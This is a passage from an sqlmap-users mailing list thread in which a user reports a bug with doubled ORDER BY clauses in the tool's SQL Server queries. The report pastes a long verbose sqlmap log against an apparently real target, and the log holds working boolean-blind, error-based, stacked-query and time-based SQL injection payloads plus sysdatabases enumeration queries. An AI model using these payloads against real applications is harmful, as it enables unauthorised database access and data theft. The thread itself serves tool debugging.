name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:48] [PAYLOAD] 20111' AND > 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:48] [PAYLOAD] 20111' AND > 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW > [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:48] [PAYLOAD] 20111' AND > 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG > [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:49] [PAYLOAD] 20111' AND > 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:50] [PAYLOAD] 20111' AND > 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:50] [PAYLOAD] 20111' AND > 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn > [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:50] [PAYLOAD] 20111' AND > 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo > [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:51] [PAYLOAD] 20111' AND > 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD > [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:52] [PAYLOAD] 20111' AND > 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:53] [PAYLOAD] 20111' AND > 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:53] [PAYLOAD] 20111' AND > 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb > [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:53] [PAYLOAD] 20111' AND > 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:54] [PAYLOAD] 20111' AND > 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:54] [PAYLOAD] 20111' AND > 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ > [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:54] [PAYLOAD] 20111' AND > 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:55] [PAYLOAD] 20111' AND > 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:55] [PAYLOAD] 20111' AND > 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP > [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:55] [PAYLOAD] 20111' AND > 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:56] [PAYLOAD] 20111' AND > 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases > WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1 > ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND 'COwJ'='COwJ > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:56] [PAYLOAD] 20111' AND > 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk > [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases > WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1 > ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND 'STKX'='STKX > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf > [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:57] [PAYLOAD] 20111' AND > 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:58] [PAYLOAD] 20111' AND > 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd > [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:58] [PAYLOAD] 20111' AND > 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:00] [PAYLOAD] 20111' AND > 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk > [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:00] [PAYLOAD] 20111' AND > 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER > [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:01] [PAYLOAD] 20111' AND > 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP > 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases > WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1 > ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > AND 'MPbC'='MPbC > [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:56:02] [DEBUG] performed 38 queries in 16 seconds > available databases [37]: > > [09:56:02] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 62 times > [09:56:02] [INFO] Fetched data logged to text files under > '/path/sqlmap-dev/output/www.vuln.com' > > [*] shutting down at: 09:56:02 > > David > > ------------------------------------------------------------------------------ > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > Pinpoint memory and threading errors before they happen. > Find and fix more than 250 security defects in the development cycle. > Locate bottlenecks in serial and parallel code that limit performance. > http://p.sf.net/sfu/intel-dev2devfeb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com Alternate: miroslav.stampar (at) mail.ru PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: David G. <sk...@gm...> - 2011-02-09 12:25:20
|
There is an error with Sql Server querys.. probably in queries.xml ?? The problem are these two ORDER BY in query send to server (--db, --tables, etc.). I checked it after upgrading to the latest svn revision. 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases *ORDER BY 1 ORDER BY name*) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'ORDER'. Log: #./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u " http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush --batch | tee saida.txt sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 09:55:04 [09:55:04] [DEBUG] cleaning up configuration parameters [09:55:04] [DEBUG] setting the HTTP timeout [09:55:04] [DEBUG] setting the HTTP Cookie header [09:55:04] [DEBUG] setting the HTTP method to GET [09:55:04] [DEBUG] creating HTTP requests opener object [09:55:04] [WARNING] the testable parameter 'p' you provided is not into the Cookie [09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as session file [09:55:04] [INFO] flushing session file [09:55:04] [INFO] testing connection to the target url [09:55:05] [INFO] testing if the url is stable, wait a few seconds [09:55:06] [INFO] url is stable [09:55:06] [PAYLOAD] 20111'(''')"('' [09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be injectable (possible DBMS: Microsoft SQL Server) [09:55:07] [INFO] testing sql injection on GET parameter 'p' [09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965 [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152 [09:55:08] [PAYLOAD] 20111 AND 3013=569 [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 [09:55:08] [PAYLOAD] 20111 AND 4255=4255 [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952 [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [09:55:11] [PAYLOAD] 20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked queries' injectable [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase time-based blind' injectable [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY 